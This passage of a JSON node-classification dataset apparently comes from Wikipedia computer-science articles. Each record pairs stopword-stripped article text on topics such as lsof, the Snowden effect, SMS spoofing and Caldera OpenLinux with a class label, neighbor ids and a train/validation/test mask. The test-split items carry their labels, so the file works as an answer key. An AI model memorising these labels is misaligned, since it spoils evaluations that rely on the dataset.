      5433,
      5245,
      6559
    ],
    "mask": "None"
  },
  {
    "node_id": 7193,
    "label": 9,
    "text": "Metasyntactic_variable:metasyntactic variable metasyntactic variable specific word set words identified placeholder computer science specifically computer programming words commonly found source code intended modified substituted applicable specific usage compilation translation executable words foo bar good examples used 330 internet engineering task force requests comments documents explaining foundational internet technologies like http websites tcp/ip email protocols mathematical analogy metasyntactic variable word variable words algebra letters used variables numbers metasyntactic variables used name entities variables functions commands whose exact identity unimportant serve demonstrate concept useful teaching programming due english foundation-language lingua franca computer programming languages variables commonly seen even programs examples programs written spoken-language audiences typical names may depend however subculture developed around given programming language metasyntactic variables used commonly across programming languages include foobar foo bar baz qux quux quuz corge grault garply waldo fred plugh xyzzy thud several words references game colossal cave adventure wibble wobble wubble flob also used uk complete reference found mit press book titled hacker dictionary spam ham eggs principal metasyntactic variables used python programming language reference comedy sketch spam monty python eponym language japanese words hoge ほげ piyo ぴよ commonly used common words variants fuga ふが hogera ほげら hogehoge ほげほげ note -ra pluralizing ending japanese reduplication also used pluralizing origin hoge metasyntactic variable known believed date early 1980s french word toto widely used variants tata titi tutu related placeholders one commonly-raised source use toto reference stock character used tell jokes tête à toto following example function name foo variable name bar metasyntactic variables lines beginning // comments spam ham eggs principal metasyntactic variables used python programming language reference famous comedy sketch spam monty python eponym language following example spam ham eggs metasyntactic variables lines beginning comments ietf rfcs computer programming languages rendered plain text making necessary distinguish metasyntactic variables naming convention since would obvious context plain text example rfc 772 cited rfc 3092 contains instance another point reflected example convention metavariable uniformly substituted instance appearances given schema contrast nonterminal symbols formal grammars nonterminals right production substituted different instances section includes bits code show metasyntactic variables used teaching computer programming concepts function prototypes different argument passing mechanisms example showing function overloading capabilities c++ language",
    "neighbors": [
      1952,
      8262,
      6633,
      8554,
      10555
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7194,
    "label": 4,
    "text": "Deep_Instinct:deep instinct deep instinct cybersecurity company applies deep learning cybersecurity company implements advanced artificial intelligence task preventing detecting malware deep instinct founded 2014 guy caspi dr. eli david nadav maman headquarters company located new york city nvidia investor april 2019 deep instinct commissioned art project titled persistence chaos chinese artist guo dong consisting laptop infected 6 pieces malware represented 95 billion damages art auctioned final bid 1,345,000",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 7195,
    "label": 2,
    "text": "Service_Request_Block:service request block service request block srb data structure mvs/370 successor versions ibm mainframe operating systems employed mainly exclusively start input/output interface srb may considered abstract highly optimized task control block tcb one associated resources access processor system resources utilized srb must accessed use branch entries new entries traditional system services formerly accessed exclusively using svc instructions srb may employ purpose abnormally terminating case svc 13 abend may used however branch entry abterm really appropriate employed start input/output interface srb always paired input/output supervisor block iosb otherwise employed srb facilitates inter -address-space communication general inter -application communication particular srbs may also employed intra -address-space processes highest possible performance required case necessary resources first acquired tcb usually job step tcb srbs scheduled i.e. presented system dispatcher compete processor resources conceivable address space may one tcb job step tcb tens hundreds even thousands srbs srbs performing almost work address space tcb merely synchronizing srbs responding communications system operator purposes synchronization tcb usually issue waitr svc 1 specifying list event control blocks ecbs one ecb per srb plus one system operator srb indicate completion tcb using branch entry post system service normally svc 2 special case would call address contained cvt0pt01 specifying ecb associated srb possibly message tcb message present often placed lowest 24 bits ecb otherwise unused highest eight bits used system disk device access network device access available srbs using improved control interval processing feature vsam fast path feature vtam respectively introduction mvs/370 successor systems whole new environment introduced service request block srb generally higher priority tcb indeed two distinct priorities global srb priority local address space srbs tcbs local srb priority local address space tcbs mvs dispatcher must manage absolute consistency across many two processors mvs/370 many sixteen processors successor systems sixteen processors available z/system models z/system support ziip dramatically increased use srbs traditional start input/output usage srb highly-optimized instance process control block mvs/370 successor systems tcb general-purpose instance process control block os/360 successor systems",
    "neighbors": [
      11656,
      7983,
      11381,
      11131,
      5598
    ],
    "mask": "Test"
  },
  {
    "node_id": 7196,
    "label": 6,
    "text": "Lsof:lsof lsof command meaning list open files used many unix-like systems report list open files processes opened open source utility developed supported victor a. abell retired associate director purdue university computing center works supports several unix flavors open files system include disk files named pipes network sockets devices opened processes one use command disk unmounted unspecified files use listing open files consulted suitably filtered necessary identify process using files view port associated daemon one see sendmail listening standard port 25 one also list unix sockets using codice_1 lsof output describes",
    "neighbors": [
      515,
      9733,
      9735,
      3976,
      4750,
      5397,
      2198,
      6812,
      6813,
      7847,
      4398,
      7983,
      823,
      1336,
      7356,
      965,
      8522,
      3659,
      9946,
      6120,
      4850,
      5492,
      9204,
      6138,
      5759
    ],
    "mask": "None"
  },
  {
    "node_id": 7197,
    "label": 1,
    "text": "Digital_Notam:digital notam digital notam digitam data set made available digital services containing information concerning establishment condition change aeronautical facility service procedure hazard timely knowledge essential systems automated equipment used personnel concerned flight operations digital notam encoding based aeronautical information exchange model aixm version 5 developed cooperation european organisation safety air navigation eurocontrol united states federal aviation administration faa support international ais community.the digitam eliminates free form text contained within notam replaces text series structured facts obtain aeronautical entity concerned 2012 federal aviation administration faa successfully launched first global digital notam notice airmen system airports airplanes united states",
    "neighbors": [
      2901
    ],
    "mask": "Test"
  },
  {
    "node_id": 7198,
    "label": 8,
    "text": "OASIS_TOSCA:oasis tosca topology orchestration specification cloud applications tosca oasis standard language describe topology cloud based web services components relationships processes manage tosca standard includes specifications describe processes create modify web services 16 january 2014 oasis tosca technical committee approved tosca 1.0 standard commercialization cloud computing offerings required manageability tenant applications particularly large scale vendors offer services wide market written related standards predate developed concurrently oasis tosca standard aws cloudformation template json data standard allow cloud application administrators define collection related aws resources worth noting cloudformation proprietary format aws tosca based therefore bring promise oasis tosca targeting check grammar compared oasis tosca one openstack foundation also defined similar standard specifying resources orchestrations managing infrastructure application lifecycles heat-translator project one first adopt tosca standardized templating cloudify open source tosca-based orchestration framework based yaml alien4cloud meaning application lifecycle enabler cloud open source tosca based designer cloud application lifecycle management platform natively integrated cloudify runtime orchestration though orchestrators plugged ubicity provides tooling orchestrators based tosca seaclouds eu fp7 funded project whose mission provide seamless adaptive multi-cloud management service-based applications natively supports tosca participating standardization standard dice eu h2020 funded project offering model-driven devops toolchain develop big data applications tosca acts pivot language dev- modelling notations -ops space i.e. deployment monitoring etc particular offering standard infrastructure-as-code generated automatically models",
    "neighbors": [
      2501,
      425,
      8203,
      7628,
      10829,
      4979,
      7320,
      6811,
      2013,
      6079
    ],
    "mask": "None"
  },
  {
    "node_id": 7199,
    "label": 4,
    "text": "Snowden_effect:snowden effect snowden effect part reactions global surveillance disclosures made edward snowden subject controversy snowden variously called hero whistleblower dissident patriot traitor july 2013 media critic jay rosen defined snowden effect direct indirect gains public knowledge cascade events reporting followed edward snowden leaks classified information surveillance state u.s. december 2013 nation wrote snowden sparked overdue debate national security individual privacy 2014 world economic forum internet experts saw news microsoft would let foreign customers store personal data servers outside america sign snowden leaks leading countries companies erect borders cyberspace forbes effect seen nearly united u.s. congress opposition massive post-9/11 domestic intelligence gathering system spring 2014 global attitudes survey pew research center found snowden disclosures tarnished image united states especially europe latin america may 2014 obama administration appointed william evanina former fbi special agent counter-terrorism specialty new government-wide national counterintelligence executive instead getting carried away concept leakers heroes evanina said august need get back basics means loyal undifferentiated unauthorized leaking criminal act dealing insider threats intelligence community priority since wikileaks published chelsea manning disclosures 2010 evanina said aftermath snowden june 2013 revelations process sped regional railway acela train year later 100,000 fewer people security clearances september 2014 director national intelligence james clapper said snowden leaks created perfect storm degrading intelligence community capabilities snowden leaks said clapper damaged relationships foreign corporate stakeholders restrained budget resources caused u.s. discontinue collecting intelligence certain targets putting united states greater risk october 2014 former director national counterterrorism center matthew g. olsen told cnn snowden disclosures made easier terrorist groups evade u.s. surveillance changing encryption methods olsen said intelligence collection individuals concern lost preventing insight activities july 2015 isil studied snowden disclosures said u.s. officials leaders using couriers encrypted communications western analysts could crack february 2015 national counterterrorism center director nicholas rasmussen told congress snowden disclosures damaged u.s. intelligence capabilities rasmussen said government knew specific terrorists learning snowden leaks u.s. collected intelligence increased security measures using new types encryption changing email addresses abandoning prior methods communicating reflecting effect leaks snowden wrote february 2015 biggest change awareness 2013 said nsa making records everybody phonecalls gchq monitoring lawyers journalists people raised eyebrows called conspiracy theorist days march 2015 usa today reported snowden effect hit guardian journalist michael wolff wrote guardian many years asserted recent selection katharine viner editor-in-chief read part deeply equivocal response part paper staff unusual power process selecting new editor snowden story according wolff developed sense journalistic queasiness around snowden difficult express party-line guardian questioning snowden retreat russia protection vladimir putin internally verboten technology industry snowden effect profound impact revealed nsa tapping information held u.s. cloud-based services google cisco lost business internationally due public outcry roles nsa spying study information technology innovation foundation published august 2013 estimated cloud-based computing industry could lost 35 billion 2016 wall street journal named snowden effect 2013 top tech story saying snowden leaks taught businesses convenience cloud cuts ways journal predicted effect would top 2014 news well given number documents yet revealed china profitable country u.s. tech companies suspicion either witting unwitting collaborators nsa spying according director research center chinese politics business indiana university effect also seen changes investment industry security back map according hussein kanji venture capitalist hoxton ventures august 8 2013 lavabit secure email provider snowden used discontinued service asked encryption keys would exposed u.s. government prosecutors emails 410,000 lavabit users next day similar provider called silent circle announced would shut possible sufficiently secure email october 2013 two companies joined forces announced new email service dark mail alliance designed withstand government surveillance revelations german chancellor angela merkel mobile tapped tech industry rushed create secure cell phone according techrepublic revelations nsa leaks rocked world chilling effect three biggest impacts seen increased interest encryption business leaving u.s. companies reconsideration safety cloud technology blackphone new yorker called phone age snowden —described smartphone explicitly designed security privacy created makers geeksphone silent circle pgp provided encryption phone calls emails texts internet browsing. ref name= kopstein/new yorker /ref since snowden disclosures americans used internet less things like email online shopping banking according april 2014 poll also april 2014 former nsa deputy director col. cedric leighton told bloomberg enterprise technology summit new york city snowden leaks performed significant disservice worldwide health internet leading brazil countries reconsider internet decentralized nature leighton suggested nation states efforts create versions internet beginning end internet know situation sudden everyone goes 'tribal mode—a german cloud swiss cloud separate internet—they significant nationalistic attempts said leighton happened snowden excuse policy excuse re-nationalize internet march 2014 new york times reported economic fallout snowden leaks boon foreign companies detriment u.s. firms daniel castro senior analyst information technology innovation foundation predicted united states cloud computing industry could lose 35 billion 2016 matthias kunisch german software executive switched u.s. cloud computing providers deutsche telekom said due snowden customers thought american companies connections nsa security analysts estimated u.s. tech companies since snowden collectively spent millions possibly billions dollars adding state-of-the-art encryption features consumer services cables link data centers july 2014 nonpartisan new america foundation summarized impact snowden revelations u.s. businesses erosion trust said report serious consequences u.s. tech firms executives france hong kong germany uk u.s. confirmed snowden leaks directly impacted companies around world think information communication technologies particularly cloud computing quarter british canadian multinational companies surveyed moving data outside u.s among u.s. companies attributing drops revenue part fallout snowden leaks cisco systems qualcomm ibm microsoft hewlett-packard proposed laws dozen foreign countries including germany brazil india would make harder u.s. firms business european union considering stricter domestic privacy legislation could result fines penalties costing u.s. firms billions dollars august 2014 massachusetts-based web intelligence firm recorded future announced found direct connection snowden leaks dramatic changes islamist terrorists interacted online 2010 privately held recorded future received investment in-q-tel nonprofit venture capital firm whose primary partner cia months snowden 2013 leaks said recorded future operatives al-qaeda associated groups completely overhauled 7-year-old encryption methods included homebrewed algorithms adopting instead sophisticated open-source software newly available downloads enabled encryption cellphones android products macs help disguise communications september 2014 seattle-based deep web dark web monitoring firm flashpoint global partners published report found little open source information available via jihadi online social media indicating snowden leaks impelled al-qaeda develop secure digital communications underlying public encryption methods employed online jihadists report concluded appear significantly changed since emergence edward snowden major recent technological advancements focused primarily expanding use encryption instant messenger mobile communications mediums may 2015 nation reported fallout edward snowden fiasco n't political—it largely economic soon extent nsa data collection became public overseas customers including brazilian government started abandoning u.s.-based tech companies droves privacy concerns dust n't settled yet tech-research firm forrester estimated losses may total 'as high 180 billion 25 percent industry revenue september 2014 new york times credited apple inc. update ios 8 encrypts data inside demonstrating snowden impact begun work way consumer products revelations said times killed recent efforts expand law also made nations around world suspicious every piece american hardware software—from phones servers made cisco systems—have 'back doors american intelligence law enforcement times situated development within post snowden era apple would longer comply nsa law enforcement requests user data instead maintaining apple n't possess key unlock data iphone however since new security protects information stored device data stored apple icloud service apple still able obtain customer information stored icloud response government requests times added google android would encryption enabled default upcoming versions",
    "neighbors": [
      4194,
      9732,
      3495,
      5384,
      6023,
      8283,
      9863,
      2800,
      6834,
      4595,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 7200,
    "label": 7,
    "text": "Qualcomm_Wi-Fi_SON:qualcomm wi-fi son qualcomm wi-fi son self-organizing network solution developed qualcomm wi-fi networks simply automatically select link different wireless networking devices together using concept mesh networking supposed improve network coverage different corners house apartment also provide improved security note technology behind solution like mesh networking cellular self-organizing network would included dynamical adjustment different access points client devices",
    "neighbors": [
      10021,
      9863
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7201,
    "label": 4,
    "text": "Chris_Klaus:chris klaus christopher w. klaus born 1973 sarasota florida american technology entrepreneur founder cto internet security systems iss company started early 1990s sold ibm 2006 1.3b 2016 ceo kaneva game company founded 2004 also main financier multiple business accelerators atlanta area klaus formed iss early 1990s student georgia institute technology eventually dropping focus growing company 2004 stepped role chief technology officer iss pursue interests although remained significant shareholder retained role company chief security advisor 2006 iss sold ibm 1.3b around 2007 klaus became one georgia tech visible contributors giving 15m naming gift build college computing new home klaus advanced computing building july 2014 klaus co-founded neurolaunch business accelerator focused towards neurotech companies atlanta october 2015 financed co-founded another accelerator cyberlaunch focuses cybersecurity machine learning startups klaus wife crissy also prominent figure fifteen years work local marketing real estate well extensive work non-profit organizations recently founded fio360 atlanta first eco-early care center",
    "neighbors": [
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 7202,
    "label": 1,
    "text": "NoSQLz:nosqlz nosqlz consistent key-value big data store nosql database z/os ibm systems developed systems programmer thierry falissard 2013 purpose provide low-cost alternative proprietary mainframe dbms version 1 free software nosqlz provides basic create read update delete crud functions designed straightforward easy implement acid properties provided real transactions optimistic concurrency control timestamp-based concurrency control multiversion concurrency control mvcc unlike version 1 version 2 nosqlz chargeable supports ibm parallel sysplex nosqlz dbms interfaced rexx cobol ibm high level assembler etc",
    "neighbors": [
      2168,
      10048,
      3323,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 7203,
    "label": 4,
    "text": "SMS_spoofing:sms spoofing sms spoofing technology uses short message service sms available mobile phones personal digital assistants set message appears come replacing originating mobile number sender id alphanumeric text spoofing legitimate uses setting company name message sent setting mobile number product name illegitimate uses impersonating another person company product also send mysterious messages look like legitimate numbers contacts sms spoofing occurs sender manipulates address information often done order impersonate user roamed onto foreign network submitting messages home network frequently messages addressed destinations outside home network – home smsc essentially “ hijacked ” send messages networks advanced cases even hijack existing contacts phone impact activity threefold legitimate use cases sms spoofing include sms spoofing attack often first detected increase number sms errors encountered bill-run errors caused spoofed subscriber identities operators respond blocking different source addresses gateway-mscs fraudsters change addresses easily by-pass measures fraudsters move using source addresses major interconnect partner may become unfeasible block addresses due potential impact normal interconnect services 2007 uk premium rate regulator phonepayplus formerly icstis concluded public consultation anonymous sms stated averse operation services however 2008 phonepayplus introduced new regulation covering anonymous sms requiring anonymous sms service providers send follow-up message recipient stating spoofed sms sent operate complaints helpline illegal send anonymous sms messages australia user prove sms sessions spoofed contact law enforcement cellular provider able track sms messages actually sent user may also modify phone settings messages authorized numbers allowed always effective since hackers could impersonating user friends well",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 7204,
    "label": 2,
    "text": "Caldera_OpenLinux:caldera openlinux caldera openlinux col defunct linux distribution originally introduced caldera 1997 based german lst power linux distribution taken developed caldera systems sco group since 1998 successor caldera network desktop put together caldera since 1995 openlinux early business-oriented distribution foreshadowed direction developments came distributions linux community generally corsair user interface netware project run novell corporation advanced technology group atg 1993 1995 novell wanted desktop environment internet connectivity conducted research better easily integrate manage network access users windows support connecting novell networks would improved later releases internet dominated unix-based operating systems relative needs novell deemed unixes day hardware intensive large charged much license fees group became convinced linux offered best possible answer os component many components well particular interest 5 april 1994 board novell hired robert frankenberg general manager hewlett-packard personal information products group replace raymond john noorda ceo novell novell stock price performed poorly recently due flagging growth novell network division nsg growing pace 19 per year unix business division usg flat desktop applications division dsg shrinking rate 400 million per year frankenberg initiative refocus company networking networking services terms corsair meant shedding pieces advanced technology group disbanded shut willows os project negotiations started would eventually lead wordperfect sold corel january 1996 ferret line new direction component kept within novell noorda family trust nft ray noorda founded venture capital investment group called canopy group two years earlier 1992 thought substantial promise os project willows project created two companies continue work started novell api company called willows software inc. founded 1993 os company became caldera inc. founded october 1994 incorporated january 1995 noorda early vision caldera create ipx-based version linux would license key components resell technology back novell continue internet desktop effect 1994 caldera started life kind outsourcing project novell based technology demo named exposé caldera started ten employees novell bryan wayne sparks founder/president novell bryce j. burns chief operations officer novell ransom h. love vp marketing novell greg page vp engineering bell labs craig bradley vp sales lotus word perfect point 1995 ransom love ray noorda took note technologies caldera put together specifically component novell caldera assembled components needed create var platform however caldera faced bootstrapping problem oem var applications often depended crucially companies commercial applications since applications n't ported linux yet could n't meaningfully port applications caldera responded creating binary applications package allowed linux run unixware openserver applications linux application binary interface abi project assisting santa cruz operation sco creating linux kernel personalities linux kernel personalities worked bring linux application compatibility sco unix formerly unixware openserver idea enable developers write unix linux common application programming interface api common application binary interface abi way developers n't work hard unix users client base inherited sco could run linux applications caldera also supported alan cox work smp linux displaced unix intel x86 platform sun microsystems would n't low-end unix path point becomes interesting light sco litigation eight years later ibm 2003 ibm company involved smp work moreover company directly involved company later became sco group essentially sco suing ibm work 1995 xfree86 still hard configure unreliable chipsets caldera shipped metrolink motif xi graphic accelerated-x known releases caldera network desktop produced sold march 1997 1996 caldera continued valuable player example 23 may 1996 linux kongress berlin germany caldera announced plans obtain posix fips certifications x/open brand unix 95 xpg4 base 95 linux operating system kernel open linux contrast cnd openlinux based lst power linux slackware-derived distribution maintained linux support team since 1993 first come linux 2.0 kernel 1996 linux support team grew stefan probst ralf flaxa company lst software gmbh lst standing linux system technology erlangen germany openlinux development led become caldera german development center caldera deutschland gmbh since may 1997 23 july 1996 caldera purchased novell dos remaining digital research assets novell order bundle dos version linux led creating opendos distribution help port dos applications caldera supported linux-port staroffice 3.1 ca 800.000 dm order offer product forthcoming openlinux distribution 1997 1997 openlinux distribution first released caldera taken form would remembered caldera switched high end linux product business linux distribution became rich features bundled proprietary software however became less community oriented released less frequently linuxes differences included automated configuration administration tools paid technical support staff built-in consistent default gui range supported applications next five years caldera systems offered additional commercial extensions linux licensed sun wabi allow people run windows applications linux additionally shipped linux versions wordperfect novell later corel coreldraw since many customers used dual boot setup fips unreliable shipped powerquest partitionmagic allow customers non-destructively repartition hard disks partnership ibm produced first linux distribution db2 compatible oracle corporation became target platform linux port oracle database ventures included starting blackdown java project creating professional certification also formed strong partnerships sco value-added reseller market started laying groundwork oem sales unix-based vertical applications caldera systems offered three versions openlinux addition people applications created many linux extensions fill voids commercial company caldera systems began working linux equivalent replacing microsoft exchange server microsoft outlook would eventually become volution messaging server offered calendaring/scheduling options shared busy/free information ssl support e-mail easy configuration additionally caldera deutschland created first fully graphical installer linux called lizard starting november 1998 invented browser-based unix system administration created webmin project employed developer jamie cameron 1999 2001 caldera systems created full featured gui system administration tool called caldera open administration system coas tool unified easy use administration tool modular design scalability broad scope abilities featured openlinux showed linux community would required create mainstream desktop os linux kernel many ways last ten years desktop progress successfully implement caldera attempting tools available using open source software place closed applications technique utilize commercial software fill largest gaps making product value add thus could charge made commercial time made advanced distribution available desktop company became caldera international direction ransom love focus desktop company became mainly marketing business relationships several reasons first caldera 280 million lawsuit microsoft dr-dos flush cash secondly caldera distribution good primary advantages use technologies owned caldera thus caldera successful success could technical standpoint imitated red hat suse turbolinux etc third years caldera competing directly sco unix 1997 linux outperformed sco almost every respect making choice switch sco caldera no-brainer companies also meant switch vendors support organizations caldera sco acquisition aimed eliminating problem caldera international corporate direction became combine sco distribution marketing var arm lamp use project monterey develop 64-bit strategy sco offered technical standpoint however caldera openlinux really shone ransom love years commercial bundling solution continued work powerful low bug linux standards distribution worked well wide range hardware charged great deal relative distributions able generate strong profit red hat pulled way ahead terms us sales global sales front trailed suse turbolinux well financially due dr-dos settlement strongest linux distributions known releases incomplete products caldera systems quickly found classic business problem interests existing business conflicted growth model santa cruz operation sco much larger company caldera systems fact 71 million revenue 90 sco side business moreover caldera systems costs 4 marketing generate 1 sales sco mature sold mainly repeat customers var relationship even problematic caldera systems always sold linux sco better model done everything possible make transition sco caldera systems relatively seamless 14,000 sco resellers made much sco sale sales caldera systems anxious move existing customers sco linux even supportive linux saw strong value add caldera systems often sold red hat enterprise linux caldera systems two businesses direct competition one shrinking still profitable unix business rapidly growing business still hemorrhaging money logical solution establish caldera systems premier linux brand without threat red hat transitioning resellers sco caldera systems would much easier mind ransom love formed alliance large business oriented linux distributions utilized kde desktop called united linux alliance comprised caldera international suse linux turbolinux conectiva filings novell sco group sco v. novell lawsuit showed simply marketing gimmick real alliance business responded favorably movement ibm amd quickly formed partnerships linux professional institute adopted united linux standard distribution training first time linux distribution suse linux engineering continued maintain large technical staff caldera international global support organization turbo linux well conectiva brought growth potential less flooded markets merger successful love sparks could claim vindication year novell reversed frankenberg decision brought united linux engineering talent back fold acquisition suse united linux rejected broader linux community use per-seat licensing highly controversial decision importantly time united linux released darl mcbride become ceo caldera international focus shifted away linux caldera international point released caldera linux distribution openunix 8 kernel instead linux kernel unix tli streams support made writing drivers easier caldera international proved replacing kernel yet change much else full featured desktop server linux 2002 caldera international board directors including ralph yarro named darl mcbride formerly franklin-covey ceo almost immediately saw value caldera international primarily value sco company renamed sco group ransom love reassigned work exclusively united linux completed left company join progeny linux systems aiming create professional debian remained capacity board member advisor 30 april 2007 progeny ceased operations mcbride began focus sco copyrights one mcbride first acts ceo collect 600,000 back licensing fees owed caldera international cleaned various linux-related licensing issues allowing new round financing soon thereafter made strong accusations linux infringed copyrights sco held unix claimed purchased copyrights novell novell denied selling unix copyright prompting sue slander title sco also initiated lawsuits ibm autozone alleging copyright infringements use distribution linux none lawsuits resolved sco created division scosource owns licenses intellectual property desktop license 699",
    "neighbors": [
      2584,
      9253,
      11305,
      5677,
      56,
      59,
      4673,
      3142,
      1110,
      1632,
      3685,
      10860,
      2671,
      7802,
      11388,
      641,
      8837,
      6797,
      10394,
      673,
      3745,
      7854,
      178,
      2738,
      4790,
      2239,
      8907,
      3791,
      4841,
      6890,
      7913,
      4333,
      9455,
      7920,
      5363,
      9461,
      11513,
      6393,
      3323,
      8957,
      5384,
      7435,
      2321,
      5397,
      4887,
      1304,
      10530,
      7983,
      823,
      3386,
      7483,
      3903,
      2375,
      2914,
      9064,
      8554,
      7020,
      7534,
      9074,
      5492,
      2424,
      6521,
      4490,
      10127,
      3487,
      10149,
      9135,
      439,
      9665,
      4039,
      9693,
      11232,
      485,
      8177,
      8690,
      499,
      8700
    ],
    "mask": "None"
  },
  {
    "node_id": 7205,
    "label": 9,
    "text": "Geometric_Description_Language:geometric description language computer-aided design geometric description language gdl programming language archicad library parts gsm file format cad objects objects similar blocks autocad unlike blocks parametric 2d 3d features connected view one get correct visualization example side view section top view plan perspective 3d view gdl scripts define archicad library part main roles 3d model 3d model projected section/elevation 2d plan 2d plan view user interface display behaviour listing quantities versions archicad contain default libraries also objects like furniture windows doors trees people cars construction elements etc several commercial websites selling high-detailed intelligent parametric objects perhaps better variable default libraries example lot environmental objects like plants people garden elements included original software gdl free technology although archicad commercial software allowed possible develop gdl based object libraries using free tools like graphisoft lp_xmlconverter graphisoft gdl web plug-in gdl programming language basic-like control flow statements variable logic 2d 3d gdl model elements linked local right-handed coordinate system placing element desired position move coordinate system desired position orientation generate element every movement rotation stretching coordinate system called transformation transformations stored stack extended transformations cut deleting one transformations top gdl maintains forward compatibility means archicad library part readable every subsequent archicad program necessarily earlier versions",
    "neighbors": [
      7209,
      3923,
      8262
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7206,
    "label": 4,
    "text": "LOMAC:lomac low water-mark mandatory access control lomac mandatory access control model protects integrity system objects subjects means information flow policy coupled subject demotion via floating labels lomac system subjects objects assigned integrity labels made one hierarchical grades depending types together label elements permit labels placed partial order information flow protections demotion decisions based dominance operator describing order",
    "neighbors": [
      2164,
      10580,
      823
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7207,
    "label": 2,
    "text": "Graphical_identification_and_authentication:graphical identification authentication graphical identification authentication gina component windows 2000 windows xp windows server 2003 provides secure authentication interactive logon services gina replaceable dynamically linked library loaded early boot process context winlogon machine started responsible handling secure attention sequence typically control-alt-delete interacting user sequence received gina also responsible starting initial processes user windows shell first log gina discontinued windows vista default gina library msgina.dll provided microsoft part operating system offers following features winlogon configured use different gina providing non-standard authentication methods smart card readers identification based biometrics provide alternate visual interface default gina developers implement replacement gina required provide implementations set api calls cover functionality displaying workstation locked dialog processing secure attention sequence various user states responding queries whether locking workstation allowed action supporting collection user credentials terminal services-based connections interacting screensaver custom gina could made entirely scratch original gina modifications custom gina specified placing string named ginadll registry location codice_1 winlogon component solely responsible calling apis gina library winlogon process starts compares version number supported loaded gina library gina library higher version winlogon windows boot done gina library written given version winlogon expect certain set api calls provided winlogon support replaceable gina dlls introduced windows nt server 3.51 windows nt workstation 4.0 sp3 successive versions windows introduced additional functionality winlogon resulting additional functionality implemented replacement gina windows 2000 example introduced support displaying status messages including verbose messages turned group policy current state user e.g applying computer settings starting applications user context facilitates restarting windows explorer automatically crashes well starting task manager windows xp introduced support fast user switching remote desktop interactive simplified user-friendly full-screen logon windows vista gina replaced credential providers allow significantly increased flexibility supporting multiple credential collection methods support use multiple gina models complex chaining method used required custom ginas often work fast user switching gina libraries work windows vista later windows versions one difference however gina could completely replace windows logon user interface credential providers",
    "neighbors": [
      641,
      3394,
      8418,
      6820,
      10839,
      5928,
      5225,
      4074,
      2027,
      8976,
      5435,
      9745,
      3351,
      10207,
      5243,
      10747,
      9791
    ],
    "mask": "None"
  },
  {
    "node_id": 7208,
    "label": 5,
    "text": "Rtelnet:rtelnet rtelnet socks client version telnet unix-like systems rtelnet utility provides similar functionality telnet hosts behind firewall normally firewalls designed permit deny network transmissions based upon set rules network accessibility across firewall reduced order provide adequate security hosts within firewall many services directly access resources placed outside firewall rtelnet utility provides functionality telnet maintaining security requirement firewall nat though utility differs much counterpart implementation behaves almost indistinguishably users terms command interface communication scheme rtelnet versatile client used connections inside hosts directly outside hosts via socks proxy servers rtelnet starts prints version number name ip address default socks proxy server stderr stream channel consults configuration file /etc/socks.conf determine whether request allowed denied based requesting user destination host requested service allowable requests configuration file also dictates whether direct proxy connection used given destination optionally actual socks servers use proxy connection rtelnet utility requires libsocket.so shared library run rtelnet listed project sourceforge code repository",
    "neighbors": [
      10242,
      3847,
      649,
      9868,
      3218,
      5397,
      9365,
      10005,
      11413,
      5402,
      5531,
      5405,
      3742,
      10271,
      9380,
      2085,
      8998,
      3751,
      3752,
      9381,
      10924,
      562,
      2996,
      9909,
      10171,
      4797,
      5181,
      3133,
      3006,
      5437,
      7364,
      2887,
      8265,
      2509,
      4687,
      6993,
      5843,
      2904,
      5469,
      5470,
      5471,
      5472,
      10341,
      10344,
      11112,
      367,
      8432,
      6651
    ],
    "mask": "None"
  },
  {
    "node_id": 7209,
    "label": 2,
    "text": "ArchiCAD:archicad archicad architectural bim cad software macintosh windows developed hungarian company graphisoft archicad offers computer aided solutions handling common aspects aesthetics engineering whole design process built environment — buildings interiors urban areas etc development archicad started 1982 original apple macintosh following launch 1987 graphisoft virtual building concept archicad became regarded first implementation bim archicad recognized first cad product personal computer able create 2d 3d geometry well first commercial bim product personal computers considered revolutionary ability store large amounts information within 3d model today 120,000 users archicad complete design suite 2d 3d drafting visualization building information modeling functions architects designers planners wide range software applications integrated archicad cover design needs architectural office archicad allows user work data-enhanced parametric objects often called smart objects users differs operational style cad programs created 1980s product allows user create virtual building virtual structural elements like walls slabs roofs doors windows furniture large variety pre-designed customizable objects come program archicad allows user work either 2d 3d representation screen two-dimensional drawings exported time even though model program database always stores data three dimensions plans elevations sections generated three-dimensional virtual building model constantly updated user 'rebuilds view detail drawings based enlarged portions model 2d detail added archicad released first file exchange based teamwork solution version 5.1 1997 allowed architects work building model simultaneously completely rewritten teamwork 2.0 solution new database approach came version 13 2009 named graphisoft bim server since changes differences sent central storage solution allows remote access project internet thus allowing worldwide project collaboration coordination 2014 introduction bimcloud better integration provided standard solutions browser-based management ldap connection http/https based communication also new scalability options available allowing multi-server layouts created optional caching servers third-party vendors manufacturers architectural products compiled libraries architectural components use archicad program includes geometric description language gdl used create new components also api application programming interface odbc database connections supported third party add-on developers via direct api links 4d 5d software vico office suite tocoman ilink archicad model exported bim-based cost estimation scheduling archicad also directly linked via api solibri model checking quality assurance tools addition graphisoft provides direct link grasshopper 3d enabling visual programming environment parametric modelling design archicad import export dwg dxf ifc bcf files among others graphisoft active member buildingsmart formerly international alliance interoperability iai industry organization publishes standards file data interoperability built environment software graphisoft one founders open bim concept supports 3d bim data exchange different design disciplines open-source platforms archicad also export 3d model corresponding 2d drawings bimx format viewed number desktop mobile platforms native bimx viewers commercial educational fully functional 30-day trial versions installed installer long hardware protection present software activated trial educational serial number archicad launched demo mode installer files downloaded without registration educational trial serial numbers obtained registration archicad available number localized versions addition translated user interface documentation versions set parametric objects object libraries developed considering specific requirements regional market different default values object properties menu arrangements etc various free commercial add-on products extensions add extra functionality archicad provide data exchange possibilities software applications extensions developed graphisoft freely available trimble sketchup google earth maxon cinema 4d import/export add-ons extensions sold separately graphisoft mep modeler graphisoft ecodesigner graphisoft virtual building explorer number add-ons provided third party vendors cigraph cadimage detailed version history see help center article",
    "neighbors": [
      7205,
      1065,
      6797,
      7983,
      10525
    ],
    "mask": "Test"
  },
  {
    "node_id": 7210,
    "label": 4,
